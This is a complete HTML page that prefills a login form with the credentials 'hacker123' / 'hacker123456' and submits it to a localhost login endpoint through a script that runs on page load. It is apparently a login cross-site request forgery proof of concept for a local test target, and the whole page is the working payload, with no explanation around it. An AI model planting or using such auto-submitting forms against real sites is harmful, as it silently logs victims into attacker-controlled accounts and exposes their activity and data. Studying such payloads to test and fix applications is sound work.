<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
</head>
<body>
    <h1>Login</h1>
    <form method="POST" action="http://localhost/user/login" enctype="application/x-www-form-urlencoded">
        <div>
            <label for="username">Username:</label>
            <input type="text" id="username" value="hacker123" name="username" required>
        </div>
        <br>
        <div>
            <label for="password">Password:</label>
            <input type="password" value="hacker123456" id="password" name="password" required>
        </div>
        <br>
        <button type="submit">Login</button>
    </form>
    <script>
        document.forms[0].submit()
    </script>
</body>
</html>